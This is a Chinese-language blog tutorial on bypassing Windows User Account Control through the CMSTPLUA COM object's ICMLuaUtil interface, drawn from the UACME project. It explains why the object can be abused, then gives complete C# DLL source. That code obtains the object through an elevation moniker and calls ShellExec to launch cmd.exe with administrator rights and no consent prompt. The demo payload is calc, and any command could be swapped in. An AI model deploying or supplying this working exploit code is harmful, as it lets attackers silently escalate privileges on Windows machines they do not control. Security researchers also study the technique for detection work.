BypassUAC With ICMLuaUtil

Share on:

本文主要讲述UACME项目中索引为41的ICMLuaUtil方法为例实现一个bypassuac,该方法原理在于调用COM组件中自动提权并且可以执行命令的接口。

什么类型的COM组件可以利用

以下是UACME项目对使用ICMLuaUtil方式的描述

1Author: Oddvar Moe
2Type: Elevated COM interface
3Method: ICMLuaUtil
4Target(s): Attacker defined
5Component(s): Attacker defined
6Implementation: ucmCMLuaUtilShellExecMethod
7Works from: Windows 7 (7600)
8Fixed in: unfixed ?
9How: -

查看该方法对应的源码发现是CMSTPLUA组件下的ICMLuaUtil接口。使用OleViewDotNet工具以管理员身份运行,查看对应的COM属性信息。

image.png

右键查看该组件的Elevation属性 image.png

首先这里的EnableAuto Approval属性为True表示可以用该组件来绕过UAC认证,这是利用条件第一点。

第二点是需要该组件中存在执行命令的点,根据上图知道该函数位于cmlua.dll。通过OleViewDotNet提供的偏移量找到虚函数表。 image.png

使用csharp调用ICMLuaUtil.ShellExec执行命令

vs创建新项目,然后添加DllExport类库 image.png

装完之后会自动运行一个init.ps1脚本弹出来一个框,让你设置要导出的dll配置。 image.png

按图配置,点击apply,然后vs中提示重新加载文件。

先来一个最简单的dll,添加System.Windows.Forms引用之后生成dll

 1
 2using System;
 3using System.Runtime.InteropServices;
 4using System.Windows.Forms;
 5
 6
 7namespace MyBypassUAC
 8{
 9    public class Class1
10    {
11        [DllExport]
12        public static void MyBypassUAC()
13        {
14            MessageBox.Show("aa");
15        }
16    }
17
18}
19

注意:你需要运行你生成对应系统位数的dll,否则你会碰到这样的错误 image.png

运行x64的dll image.png 这样就是一个简单的demo了。接下来写bypassuac的东西。

  1using System;
  2using System.Runtime.CompilerServices;
  3using System.Runtime.InteropServices;
  4
  5
  6namespace MyBypassUAC
  7{
  8    public class Class1
  9    {
 10        internal enum HRESULT : long
 11        {
 12            S_FALSE = 0x0001,
 13            S_OK = 0x0000,
 14            E_INVALIDARG = 0x80070057,
 15            E_OUTOFMEMORY = 0x8007000E
 16        }
 17
 18        [StructLayout(LayoutKind.Sequential)]
 19        internal struct BIND_OPTS3
 20        {
 21            internal uint cbStruct;
 22            internal uint grfFlags;
 23            internal uint grfMode;
 24            internal uint dwTickCountDeadline;
 25            internal uint dwTrackFlags;
 26            internal uint dwClassContext;
 27            internal uint locale;
 28            object pServerInfo; // will be passing null, so type doesn't matter
 29            internal IntPtr hwnd;
 30        }
 31
 32        [Flags]
 33        internal enum CLSCTX
 34        {
 35            CLSCTX_INPROC_SERVER = 0x1,
 36            CLSCTX_INPROC_HANDLER = 0x2,
 37            CLSCTX_LOCAL_SERVER = 0x4,
 38            CLSCTX_REMOTE_SERVER = 0x10,
 39            CLSCTX_NO_CODE_DOWNLOAD = 0x400,
 40            CLSCTX_NO_CUSTOM_MARSHAL = 0x1000,
 41            CLSCTX_ENABLE_CODE_DOWNLOAD = 0x2000,
 42            CLSCTX_NO_FAILURE_LOG = 0x4000,
 43            CLSCTX_DISABLE_AAA = 0x8000,
 44            CLSCTX_ENABLE_AAA = 0x10000,
 45            CLSCTX_FROM_DEFAULT_CONTEXT = 0x20000,
 46            CLSCTX_INPROC = CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER,
 47            CLSCTX_SERVER = CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_REMOTE_SERVER,
 48            CLSCTX_ALL = CLSCTX_SERVER | CLSCTX_INPROC_HANDLER
 49        }
 50
 51        const ulong SEE_MASK_DEFAULT = 0x0;
 52        const ulong SW_SHOW = 0x5;
 53
 54        [DllImport("ole32.dll", CharSet = CharSet.Unicode, ExactSpelling = true, PreserveSig = false)]
 55        [return: MarshalAs(UnmanagedType.Interface)]
 56        internal static extern object CoGetObject(
 57          string pszName,
 58          [In] ref BIND_OPTS3 pBindOptions,
 59          [In, MarshalAs(UnmanagedType.LPStruct)] Guid riid);
 60
 61        [DllExport]
 62        public static void MyBypassUAC()
 63        {
 64            Guid classId_cmstplua = new Guid("3E5FC7F9-9A51-4367-9063-A120244FBEC7");
 65            // Interface ID
 66            Guid interfaceId_icmluautil = new Guid("6EDD6D74-C007-4E75-B76A-E5740995E24C");
 67
 68            ICMLuaUtil icm = (ICMLuaUtil)LaunchElevatedCOMObject(classId_cmstplua, interfaceId_icmluautil); ;
 69            icm.ShellExec(@"cmd.exe", string.Format("/c {0}", "calc"), @"C:\windows\system32\", SEE_MASK_DEFAULT, SW_SHOW);
 70            Marshal.ReleaseComObject(icm);
 71        }
 72
 73        public static object LaunchElevatedCOMObject(Guid Clsid, Guid InterfaceID)
 74        {
 75            string CLSID = Clsid.ToString("B");
 76            string monikerName = "Elevation:Administrator!new:" + CLSID;
 77
 78            BIND_OPTS3 bo = new BIND_OPTS3();
 79            bo.cbStruct = (uint)Marshal.SizeOf(bo);
 80            bo.hwnd = IntPtr.Zero;
 81            bo.dwClassContext = (int)CLSCTX.CLSCTX_LOCAL_SERVER;
 82
 83            object retVal = CoGetObject(monikerName, ref bo, InterfaceID);
 84
 85            return (retVal);
 86        }
 87
 88        [ComImport, Guid("6EDD6D74-C007-4E75-B76A-E5740995E24C"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
 89        interface ICMLuaUtil
 90        {
 91            //[MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
 92            //void QueryInterface([In, MarshalAs(UnmanagedType.LPStruct)] Guid riid, [In, Out] ref IntPtr ppv);
 93            //[MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
 94            //void AddRef();
 95            //[MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
 96            //void Release();
 97            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
 98            void Method1();
 99            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
100            void Method2();
101            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
102            void Method3();
103            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
104            void Method4();
105            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
106            void Method5();
107            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
108            void Method6();
109            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
110            HRESULT ShellExec(
111                [In, MarshalAs(UnmanagedType.LPWStr)]string file,
112                [In, MarshalAs(UnmanagedType.LPWStr)]string paramaters,
113                [In, MarshalAs(UnmanagedType.LPWStr)]string directory,
114                [In]ulong fMask,
115                [In]ulong nShow);
116            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
117            void Method8();
118            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
119            void Method9();
120            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
121            void Method10();
122            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
123            void Method11();
124            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
125            void Method12();
126            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
127            void Method13();
128            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
129            void Method14();
130            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
131            void Method15();
132            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
133            void Method16();
134            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
135            void Method17();
136            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
137            void Method18();
138            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
139            void Method19();
140            [MethodImpl(MethodImplOptions.InternalCall, MethodCodeType = MethodCodeType.Runtime), PreserveSig]
141            void Method20();
142        }
143    }
144}

通过创建ICMLuaUtil com对象icm,调用其方法ShellExec执行命令实现uac提权。

image.png

参考

  1. https://cloud.tencent.com/developer/article/1623517
  2. https://github.com/cnsimo/BypassUAC/tree/master/BypassUAC_Dll_csharp
  3. https://github.com/Cn33liz/p0wnedShell/blob/master/p0wnedShell/Opsec/p0wnedMasq.cs
  4. https://gist.github.com/Moriarty2016/931e86a70aadaf48b067d8a34f28a979

文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。